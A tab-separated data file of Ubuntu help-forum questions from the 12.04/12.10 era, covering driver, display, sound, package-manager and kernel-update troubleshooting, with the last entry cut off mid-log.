248609	upgrade to 12.04 64 bit	tonight i will be updgrading my 32bit to 64bit . these may seem like basic questions but not my area of expertise . fresh install is the way , so i will be downloading from site onto usb . i will back up all my files onto a external drive , but i just wanted to check that in theory if nothing went wrong during installation then my files like word docs and downloads should still be on my computer , am i correct in my thinking here ? because as i remember when i upgraded from 10.04 to 12.04 ( 32 bit ) everything stayed the same , docs , downloads etc
248610	my pc seems stuck during shutting down . how can i fix this and have it power off ?	i was running ubuntu normally and one time i ran the command startx in my terminal and then my screen became black . so i powered off through the cable then when i reboot , it does n't log in so i had to restart the lighdm ( i think ) now it does open . if i shutdown it does n't power off . it just shows the screen below for hours and hours , i can power off my pc by removing the cable only . as suggested , on pressing esc , i see : stopping tor daemon ... stopping postgresql 9.1 database server [ ok ]
248614	how can i change the mount point of an external hard drive	my external hdd currently automatically mounts at a certain name , let 's say /media/500gb hard drive . i wish to make it mount at a different location , for example /media/500gb_hdd . i have looked inside disk utility , and have been able to change the label of the partition , but not change the name of the mount point . i have attempted to unmount and remount in terminal : $ sudo mount -t hpfs /dev/sdc2 /media/500gb_hdd/ mount : wrong fs type , bad option , bad superblock on /dev/sdc2 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so according to disk utility , the type is hfs+ . what can i do to change the hard drive 's mount point ?
248616	how to open the default gui text editor in ubuntu or lubuntu via a script ?	i have a script that uses gedit to open text file in ubuntu . that script does not work under lubuntu . what command is required to execute the default text editor ? i want to make the script usable under ubuntu and lubuntu .
248630	boots into console instead of gui . gui wanted instead	my problem is that more often than not , when i boot into ubuntu 12.04 it brings me to the command-line prompt and asks for my login . after logging in i have to either try using sudo rm /etc/x11/xorg.confg or reinstall the nvidia 310 drivers in order to get my gui back . the error that the terminal puts out is 0 screens found . i am quite confused as to why that is . is it because i have a dvi input ? but after using the sudo rm /etc/x11/xorg.confg command or reinstalling the nvidia 310 drivers , it 's works fine until next boot . it 's a bit inconvenient so if someone knows a fix to this , it 'd be so so appreciated . i apologize if there already is a question like this posted , but i did check and i could n't see anything from what i saw . i originally installed the nvidia drivers using the jockey . ( additional drivers ) however now when i have to reinstall the drivers i just use the .run file from the website . $ dkms status nvidia , 310.32 , 3.2.0-36-generic , x86_64 : installed nvidia-experimental-310 , 310.14 , 3.2.0-36-generic , x86_64 : installed . $ lspci -nnk | grep -iea3 vga 06:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:1188 ] ( rev a1 ) subsystem : nvidia corporation device [ 10de:095b ] kernel driver in use : nvidia kernel modules : nvidia , nvidia_experimental_310 , nouveau , nvidiafb further system information : alienware aurora r4 x79 intel chipset motherboard cpu : i7-3990k @ 3.20ghz x 12 gpu : nvidia gtx 690 ubuntu 12.04 64-bit .
248631	sound widget daemon name in ubuntu 12	there is a popping window in lightdm that comes up when i click the volume adjustment buttons on my all-in-one asus pc . what daemon is responsible for it . is there a way to use such widget without running lightdm itself ?
248632	run diff command to compare all files in directory	i have two folders having in theory an identical folder structure and the same files . i wish to check for differences between the two copies in the two folders . i can run diff folder1/file1 folder2/file1 one by one but this is time consuming . is there a way to identify which are the files which differ in the two folders ? if not is there at least a way to compare the contents of a folder with the contents of the second folder ?
248642	how do i enable hdmi output on nvidia gtx 650 ?	i just built new pc : amd 8350 cpu asus sabertooth motherboard nvidia gtx 650 graphics card ubuntu 12.10 system boots fine and desktop is fine using vga connection , but there is no hdmi video output to the monitor ( hp w2207h ) using the nouveau drivers . tried a second other type of monitor with hdmi and had the same thing `` no signal '' . so i used `` system settings '' and changed from nouveau driver to nvidia proprietary but still have `` no signal '' from the hdmi port . on both monitors i did press the on screen menu to attempt to switch the hdmi port but on both they just time out and display `` no signal '' and return me to the vga input . i did put a call on sunday to pny ( the brand of gtx 650 card i bought ) to ask them for any possible solution . i 'd appreciate any suggestions about how to troubleshoot this further to understand why and how to enable the hdmi port 's video output to either of these two monitors .
248644	run diff on symlinks	i have two folders containing a number of broken symlinks . is there a way to make diff compare the target of the links instead of trying to follow the links ?
248646	how to run the savage 2 after install ?	i have downloaded and installed the `` savage2-2.1.0.8-linux-installer.run '' , but i 'm not able to run this game.. the game installed properly . please tell me how to play ?
248649	toshiba satellite m115 sound issue in ubuntu 12.04 lts	i have seen similar problems on this site and on others , and i have tried all sorts of solutions posted , but so far non have worked . i have a toshiba satellite m115-s1061 that came with windows xp . i want to learn linux so i installed ubuntu 12.04 lts and the sound is n't not working correctly . it worked fine on windows xp beforehand . i have also tried linux mint on this machine with the same results . i can very faintly hear sound if i plug in headphones , but nothing comes out of the speakers . when i open the sound settings , there is nothing listed in the play through box under the output tab . i click `` test sound '' and nothing happens . under the applications tab it shows alsa plugin [ plug-in container ] . the volume for that is all the way up , however , at the bottom of the window it says output volume , and that 's all way down and i ca n't adjust it . i have no idea how to solve this and i really would like to have sound coming through the speakers and more volume coming out of the headphones .
248654	display issues after running latest updates for ubuntu 12.10	i have ubuntu 12.10 32-bit on a dual boot with windows 7 64-bit and installed updates over the past friday . saturday when i booted up , the login screen had major graphical issues where it looks like almost the entire screen is blocked out with a weird striped screen . i can just barely see my wallpaper at the top and i can log in . i am running a radeon hd 6570 video card using ati 's drivers . since saturday , i have tried to repair from disc but the issue remained . i tried reinstalling fresh and i get the proper image until i run updates . i 've basically tried everything i can think of but the issue always comes back after the latest updates . as of right now i think my options are to go back to 12.04 , try 12.10 64-bit , or try one of the generic proprietary drivers . i know of the issue involving radeon , ati and the blank desktop/no mouse situation but this is n't related to that as i can get it to happen without having catalyst on the system . any insight , help , or shared grieving would be appreciated .
248656	hdmi only works when running off battery	i 've installed ubuntu 12.10 and when i plug it into hdmi i get visual but not audio ( i tried troubleshooting this and ended up hurting myself more than i helped and had to reload the os ) . that 's fine for now i can just plug in some speakers . but then after an hour i get a warning that i am low on battery life , so i plug in my computer and then all of a sudden hdmi does n't work . the tv screen would say something like 'unsupported signal ' or just 'ca n't find signal ' . i tried unplugging the power , and sure enough hdmi worked again . graphics card : advanced micro devices [ amd ] nee ati rs880m [ mobility radeon hd 4200 series ] i have n't loaded any new drivers besides whatever came on this by default when i loaded the os . i 'm running a hp pavilion dv6 with an amd processor . $ xrandr -q # without hdmi plugged in screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 vga-0 disconnected ( normal left inverted right x axis y axis ) lvds connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 59.6*+ 1280x720 59.9 1152x768 59.8 1024x768 59.9 800x600 59.9 848x480 59.7 720x480 59.7 640x480 59.4 hdmi-0 disconnected ( normal left inverted right x axis y axis ) $ xrandr -q # with hdmi plugged in and power screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 vga-0 disconnected ( normal left inverted right x axis y axis ) lvds connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 59.6*+ 1280x720 59.9 1152x768 59.8 1024x768 59.9 800x600 59.9 848x480 59.7 720x480 59.7 640x480 59.4 hdmi-0 connected ( normal left inverted right x axis y axis ) 1920x1080 60.0 + 24.0 30.0 1680x1050 59.9 1680x945 60.0 1400x1050 59.9 1600x900 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1280x800 59.9 1280x768 60.0 1280x720 60.0 1024x768 60.0 1440x480 30.0 1440x480i 30.0 1024x576 60.0 800x600 60.3 56.2 848x480 60.0 720x480 59.9 640x480 60.0 59.9 now i am not getting consistant results . i plugged in the hdmi cord ( with the power cord plugged in ) and nothing happened . i unplugged the power cord and plugged it back in and then i got video on both the tv and my laptop screen . i then unplugged it and only got video on the tv screen , then the cycle starts over as i unplug and replug wallpower . this is so weird . any ideas to get this working and predictable ?
248658	what mtp program to use for htc one x+	im running xubuntu 12.10 and i 'm trying to add files to my htc one x+ but the programs i 've used ( gmtp , qlix and mtpfs using http : //forum.xda-developers.com/showthread.php ? t=2055563 ) have n't worked at all as they all said they could n't find any `` raw devices '' is there any other mtp programs out there i can use that are more likely to work ?
248659	creating shortcuts with shell script	i have programed a java program . to run it i write java -jar /path/name.jar in the terminal . i have made a script ( .sh ) which installs the program on the system . i want the script to create a shortcut to the java program in both the desktop and the launcher . anyone who know how to do it ?
248663	wine not working 12.10 64bit	i just got a new computer and installed 64bit ubuntu for the first time . things were going well but i can not run any exe files ( 32bit ) . all i get is a little loading circle then nothing . here is the errors given by terminal . wine : virtual memory exhausted i know the apps / games im using work in wine as i installed them on 32bit no problem . any suggestions ?
248667	how to open pseudo-terminal devices on terminal ?	i 'm trying to make functional test on a keyboard which is designed for security cameras ' management and according to guide document , i need to launch the application on the terminal and request the dev/ttyacm0 device . i do n't have any application for this and i also have n't come across anyone who has something similar like that . ( application to use an universal camera keyboard ) what i wonder is , is there any way to test functionalities of my keyboard without installing any program ? i 'm able to test my camera 's stream over browser , is it possible to do something similar like that ? if it is not , can you recommend any program to use in my ubuntu ?
248673	installation of matlab using wine	i have installed wine and i have .exe file of matlab.when i tried to open setup.exe file of matlab with wine program loader , it does nothing.but i was able to open notepad.exe . i really want to know what the promblem is and how to debug it
248676	pc freezes after long period of inactivity ( ~ > 30 min )	my ubuntu system is configured to turn off the screen and lock itself after 10 minutes of inactivity . ( system settings -- - > brightness and screen lock ) . if i leave the pc for about 10 mins or 15 mins , i just move the mouse and set the password , and i 'm good to go . but if i leave my pc for let 's say 30 mins or longer , then when i try to wake up the system by moving the mouse , everything freezes and the only option is to reset . my system is ubuntu 12.04 lts and my pc is a acer aspire 5750g
248677	kernel module memory access	can two different kernel modules gain access to the same area of memory from a call to ioremap_nocache ( ) ? i have a wireless driver , and a separate module , i would like the separate module to profile the noise values on the card , whilst the driver is still operating . hence my question above . one avenue i explored was to start a kernel thread from the driver , i then implemented a semaphore to prevent any race conditions arising from concurrent read/writes to the same address space . i hoped that a child thread would be able to access the same area of memory . unfortunately this has not worked as i expected . i would appreciate any suggestions .
248681	can not found compizconfig package	i tried to install on software center but ca n't found package : failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/universe/c/compiz/python-compizconfig_0.9.8.4+bzr3407-0ubuntu1_i386.deb 404 not found [ ip : 91.189.91.15 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/universe/c/compiz/compizconfig-settings-manager_0.9.8.4+bzr3407-0ubuntu1_all.deb 404 not found [ ip : 91.189.91.15 80 ] and i tried on terminal have problem to : ( myuser @ ubuntu : ~ $ sudo aptitude install compizconfig-settings-manager [ sudo ] password for myuser : the following new packages will be installed : compizconfig-settings-manager python-compizconfig { a } 0 packages upgraded , 2 newly installed , 0 to remove and 151 not upgraded . need to get 1,152 kb of archives . after unpacking 4,787 kb will be used . do you want to continue ? [ y/n/ ? ] y err http : //us.archive.ubuntu.com/ubuntu/ quantal-updates/universe python-compizconfig i386 1:0.9.8.4+bzr3407-0ubuntu1 404 not found [ ip : 91.189.91.13 80 ] err http : //us.archive.ubuntu.com/ubuntu/ quantal-updates/universe compizconfig-settings-manager all 1:0.9.8.4+bzr3407-0ubuntu1 404 not found [ ip : 91.189.91.13 80 ] 0 % [ working ] e : failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/universe/c/compiz/python-compizconfig_0.9.8.4+bzr3407-0ubuntu1_i386.deb : 404 not found [ ip : 91.189.91.13 80 ] [ 404 ] why ? how i can solve this problem ? i tried without vpn and with vpn .
248682	steam counter strike 1.6 linux beta with optimus ( optirun/primusrun )	i was able to run sam 3 on nvidia card before . now they added cs 1.6 but they changed paths . i modified the original command i was using for sam3 but it doesnt work . cd ~/.steam/steam/steamapps/common/half-life/ & & export ld_library_path=~/.steam/steam/ubuntu12_32 & & primusrun ./hl_linux -game cstrike -console -dev -numericping -noipx its giving me this error : error : libsteam_api.so : can not open shared object file : no such file or directory could not load hw.so .
248685	can not update/install apps `` untrusted packages ''	i 'm struggling to get my ubuntu to update / download any apps , as it always displays `` requires installation of untrusted packages '' . i have read on other posts that the command should solve the problem but it hasnt : sudo apt-get update this is the result aaron @ aaron-laptop : ~ $ sudo apt-get update [ sudo ] password for aaron : ign http : //security.ubuntu.com precise-security inrelease ign http : //archive.canonical.com precise inrelease ign http : //extras.ubuntu.com precise inrelease ign http : //gb.archive.ubuntu.com precise inrelease ign http : //gb.archive.ubuntu.com precise-updates inrelease hit http : //extras.ubuntu.com precise release.gpg [ cut a bit out here because it seemed unnecessary ? ] fetched 69.2 kb in 2min 0s ( 572 b/s ) reading package lists ... done w : gpg error : http : //gb.archive.ubuntu.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : an error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //gb.archive.ubuntu.com precise-updates release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-backports/release.gpg rename failed , no such file or directory ( - > /var/lib/apt/lists/partial/gb.archive.ubuntu.com_ubuntu_dists_precise-backports_release.gpg ) . w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/precise-updates/release w : some index files failed to download . they have been ignored , or old ones used instead . aaron @ aaron-laptop : ~ $ so my question is , what can i do to fix it ? thanks in advance , aaron edit after using the command aaron @ aaron-laptop : ~ $ sudo apt-get -o acquire : :http : :no-cache=true -o acquire : :brokenproxy=true update the result i got was : w : gpg error : http : //mirrors.ccs.neu.edu precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : conflicting distribution : http : //mirrors.ccs.neu.edu precise-updates release ( expected precise-updates but got precise ) w : gpg error : http : //mirrors.ccs.neu.edu precise-security release : unknown error executing gpgv w : failed to fetch http : //mirrors.ccs.neu.edu/ubuntu/dists/precise-security/release.gpg rename failed , no such file or directory ( - > /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-security_release.gpg ) . w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_main_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_restricted_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_universe_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_multiverse_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_main_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_restricted_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_universe_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_multiverse_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_main_binary-i386_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_restricted_binary-i386_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_universe_binary-i386_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_multiverse_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . and the other aaron @ aaron-laptop : ~ $ apt-key list gpg : fatal : /home/aaron/.gnupg : directory does not exist ! secmem usage : 0/0 bytes in 0/0 blocks of pool 0/32768 aaron @ aaron-laptop : ~ $ think this is what you wanted : aaron @ aaron-laptop : ~ $ apt-key list gpg : fatal : /home/aaron/.gnupg : directory does not exist ! secmem usage : 0/0 bytes in 0/0 blocks of pool 0/32768 aaron @ aaron-laptop : ~ $ ls -al /etc/apt/trusted.gpg* -rw-r -- r -- 1 root root 18402 jan 28 19:10 /etc/apt/trusted.gpg -rw-r -- r -- 1 root root 19835 jan 28 18:39 /etc/apt/trusted.gpg~ /etc/apt/trusted.gpg.d : total 8 drwxr-xr-x 2 root root 4096 apr 20 2012 . drwxr-xr-x 6 root root 4096 jan 28 19:10 .. aaron @ aaron-laptop : ~ $ apt-key -- keyring /etc/apt/trusted.gpg list gpg : fatal : /home/aaron/.gnupg : directory does not exist ! secmem usage : 0/0 bytes in 0/0 blocks of pool 0/32768 aaron @ aaron-laptop : ~ $ i inputted the command you told me to giving me : aaron @ aaron-laptop : ~ $ gpg -- keyserver pgpkeys.mit.edu -- recv-key 40976eaf c0b21f32 3e5c1192 # 2004 , 2012 and extras key gpg : requesting key 40976eaf from hkp server pgpkeys.mit.edu gpg : requesting key c0b21f32 from hkp server pgpkeys.mit.edu gpg : requesting key 3e5c1192 from hkp server pgpkeys.mit.edu gpgkeys : key 40976eaf not found on keyserver gpg : key c0b21f32 : `` ubuntu archive automatic signing key ( 2012 ) < ftpmaster @ ubuntu.com > '' not changed gpg : key 3e5c1192 : `` ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > '' not changed gpg : total number processed : 2 gpg : unchanged : 2 aaron @ aaron-laptop : ~ $ gpg -a -- export 40976eaf | sudo apt-key add - gpg : no valid openpgp data found . aaron @ aaron-laptop : ~ $ gpg -a -- export c0b21f32 | sudo apt-key add - ok aaron @ aaron-laptop : ~ $ gpg -a -- export 3e5c1192 | sudo apt-key add - ok aaron @ aaron-laptop : ~ $ should i now run `` sudo apt-get update '' ? or is there anything else i should do first ? ok did the new thing to then did the update and got this : w : gpg error : http : //mirrors.ccs.neu.edu precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : conflicting distribution : http : //mirrors.ccs.neu.edu precise-updates release ( expected precise-updates but got precise ) w : gpg error : http : //mirrors.ccs.neu.edu precise-security release : unknown error executing gpgv w : failed to fetch http : //mirrors.ccs.neu.edu/ubuntu/dists/precise-backports/release.gpg rename failed , no such file or directory ( - > /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-backports_release.gpg ) . w : failed to fetch http : //mirrors.ccs.neu.edu/ubuntu/dists/precise-security/release.gpg rename failed , no such file or directory ( - > /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-security_release.gpg ) . w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_main_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_restricted_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_universe_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_multiverse_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_main_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_restricted_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_universe_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_multiverse_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_main_binary-i386_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_restricted_binary-i386_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_universe_binary-i386_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/mirrors.ccs.neu.edu_ubuntu_dists_precise-updates_multiverse_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . any ideas ? : /
248689	wrong resolution on grub2 ?	my optimal screen resolution is 1600x900px , however when i first turn on my laptop , grub2 displays at 1024x768 . i have an optimus system , so i am assuming that grub is using the intel card . when i do vbeinfo it says the maximum resolution is 1024x768 , but the optimal resolution is 1600x900 . i have tried adding i915.modeset=1 to my grub config and changing grub_gfxmode to 1600x900 but to no avail . all help would be appreciated !
248695	ubuntu 12.10 restarts unexpectedly and runs very slow	i am new to ubuntu and have installed ubuntu 12.10 . i have first time tried os other than windows . i have processor : genuine intel® cpu t2250 @ 1.73ghz × 2 ram : 2.0 gb graphics : intel® 945gm x86/mmx/sse2 hdd : 155 gb available disk : 92.1 gb os type : 32 bit my laptop is very slow and restarts unexpectedly . whenever i try to open any folder , file or application , it take quiet a long time to open ... . please help..
248698	open subl url in ubuntu with chrome	i have a project in rails and i 'm using better_errors which generate error pages with links to files where is originated a specific error . these links are something like : subl : //open ? url=file : //path/to/my/file & line=line_number_where_the_error_happens now when i click the link in chrome is asking me to use xdg-open to open it , but is just opening another empty chrome window . should i configure chrome to open these kind of links with sublime text ? or i must to configure xdg-open to open with sublime this specific kind ? and how can i do it ?
248700	how do i obtain the offical ubuntu patched kernel source without using git ?	i 'm needing to custom compile a kernel to enable some very specific hardware features that are not on by default and have to be compiled in . i started following this guide but it seems to be slightly outdated for 12.04 onwards as some commands fail with missing source packages . https : //help.ubuntu.com/community/kernel/compile what is the easiest way to rebuild the current kernel source so i can tweak the options i need ?
248705	installing a package works , but then i have to wait for 10 minutes for several `` dpkg : error processing linux-headers ... '' errors	whenever i try to apt-get install something or use the synaptic package manager to install / uninstall something , i have to wait for > 10 minutes and the following report is generated : ( reading database ... 146959 files and directories currently installed . ) removing multitail ... processing triggers for man-db ... setting up linux-image-2.6.32-41-generic ( 2.6.32-41.94 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.32-41-generic running postinst hook script /usr/sbin/update-grub . generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.32-45-generic found initrd image : /boot/initrd.img-2.6.32-45-generic found linux image : /boot/vmlinuz-2.6.32-43-generic found initrd image : /boot/initrd.img-2.6.32-43-generic found linux image : /boot/vmlinuz-2.6.32-42-generic found initrd image : /boot/initrd.img-2.6.32-42-generic found linux image : /boot/vmlinuz-2.6.32-41-generic found initrd image : /boot/initrd.img-2.6.32-41-generic found linux image : /boot/vmlinuz-2.6.32-21-generic found initrd image : /boot/initrd.img-2.6.32-21-generic found memtest86+ image : /boot/memtest86+.bin done examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 2.6.32-41-generic /boot/vmlinuz-2.6.32-41-generic run-parts : failed to exec /etc/kernel/postinst.d/dkms : exec format error run-parts : /etc/kernel/postinst.d/dkms exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-2.6.32-41-generic.postinst line 1003. dpkg : error processing linux-image-2.6.32-41-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up linux-image-2.6.32-42-generic ( 2.6.32-42.96 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.32-42-generic running postinst hook script /usr/sbin/update-grub . generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.32-45-generic found initrd image : /boot/initrd.img-2.6.32-45-generic found linux image : /boot/vmlinuz-2.6.32-43-generic found initrd image : /boot/initrd.img-2.6.32-43-generic found linux image : /boot/vmlinuz-2.6.32-42-generic found initrd image : /boot/initrd.img-2.6.32-42-generic found linux image : /boot/vmlinuz-2.6.32-41-generic found initrd image : /boot/initrd.img-2.6.32-41-generic found linux image : /boot/vmlinuz-2.6.32-21-generic found initrd image : /boot/initrd.img-2.6.32-21-generic found memtest86+ image : /boot/memtest86+.bin done examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 2.6.32-42-generic /boot/vmlinuz-2.6.32-42-generic run-parts : failed to exec /etc/kernel/postinst.d/dkms : exec format error run-parts : /etc/kernel/postinst.d/dkms exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-2.6.32-42-generic.postinst line 1003. dpkg : error processing linux-image-2.6.32-42-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up linux-image-2.6.32-43-generic ( 2.6.32-43.97 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.32-43-generic running postinst hook script /usr/sbin/update-grub . generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.32-45-generic found initrd image : /boot/initrd.img-2.6.32-45-generic found linux image : /boot/vmlinuz-2.6.32-43-generic found initrd image : /boot/initrd.img-2.6.32-43-generic found linux image : /boot/vmlinuz-2.6.32-42-generic found initrd image : /boot/initrd.img-2.6.32-42-generic found linux image : /boot/vmlinuz-2.6.32-41-generic found initrd image : /boot/initrd.img-2.6.32-41-generic found linux image : /boot/vmlinuz-2.6.32-21-generic found initrd image : /boot/initrd.img-2.6.32-21-generic found memtest86+ image : /boot/memtest86+.bin done examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 2.6.32-43-generic /boot/vmlinuz-2.6.32-43-generic run-parts : failed to exec /etc/kernel/postinst.d/dkms : exec format error run-parts : /etc/kernel/postinst.d/dkms exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-2.6.32-43-generic.postinst line 1003. dpkg : error processing linux-image-2.6.32-43-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up linux-image-2.6.32-45-generic ( 2.6.32-45.102 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.32-45-generic running postinst hook script /usr/sbin/update-grub . generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.32-45-generic found initrd image : /boot/initrd.img-2.6.32-45-generic found linux image : /boot/vmlinuz-2.6.32-43-generic found initrd image : /boot/initrd.img-2.6.32-43-generic found linux image : /boot/vmlinuz-2.6.32-42-generic found initrd image : /boot/initrd.img-2.6.32-42-generic found linux image : /boot/vmlinuz-2.6.32-41-generic found initrd image : /boot/initrd.img-2.6.32-41-generic found linux image : /boot/vmlinuz-2.6.32-21-generic found initrd image : /boot/initrd.img-2.6.32-21-generic found memtest86+ image : /boot/memtest86+.bin done examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 2.6.32-45-generic /boot/vmlinuz-2.6.32-45-generic run-parts : failed to exec /etc/kernel/postinst.d/dkms : exec format error run-parts : /etc/kernel/postinst.d/dkms exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-2.6.32-45-generic.postinst line 1003. dpkg : error processing linux-image-2.6.32-45-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-2.6.32-45-generic ; however : package linux-image-2.6.32-45-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 2.6.32.45.52 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured setting up linux-headers-2.6.32-45-generic ( 2.6.32-45.102 ) ... no apport report written because maxreports has already been reached no apport report written because maxreports has already been reached no apport report written because maxreports has already been reached examining /etc/kernel/header_postinst.d . run-parts : executing /etc/kernel/header_postinst.d/dkms 2.6.32-45-generic /boot/vmlinuz-2.6.32-45-generic run-parts : failed to exec /etc/kernel/header_postinst.d/dkms : exec format error run-parts : /etc/kernel/header_postinst.d/dkms exited with return code 1 failed to process /etc/kernel/header_postinst.d at /var/lib/dpkg/info/linux-headers-2.6.32-45-generic.postinst line 110. dpkg : error processing linux-headers-2.6.32-45-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-headers-generic : linux-headers-generic depends on linux-headers-2.6.32-45-generic ; however : package linux-headers-2.6.32-45-generic is not configured yet . dpkg : error processing linux-headers-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports has already been reached no apport report written because maxreports has already been reached errors were encountered while processing : linux-image-2.6.32-41-generic linux-image-2.6.32-42-generic linux-image-2.6.32-43-generic linux-image-2.6.32-45-generic linux-image-generic linux-generic linux-headers-2.6.32-45-generic linux-headers-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) there 's a great delay whenever this line is shown : update-initramfs : generating /boot/initrd.img-2.6.32-xxx-generic ... where xxx in my case takes values from 41 to 45 . my uname -srv reports : linux 2.6.32-45-generic # 102-ubuntu smp wed jan 2 21:53:06 utc 2013 i 've tried sudo apt-get install -f but it did not solve my issue . i do n't know if it helps but the final dialog box that synaptic package manager shows whenever a package is removed or added is : e : linux-image-2.6.32-41-generic : subprocess installed post-installation script returned error exit status 2 e : linux-image-2.6.32-42-generic : subprocess installed post-installation script returned error exit status 2 e : linux-image-2.6.32-43-generic : subprocess installed post-installation script returned error exit status 2 e : linux-image-2.6.32-45-generic : subprocess installed post-installation script returned error exit status 2 e : linux-image-generic : dependency problems - leaving 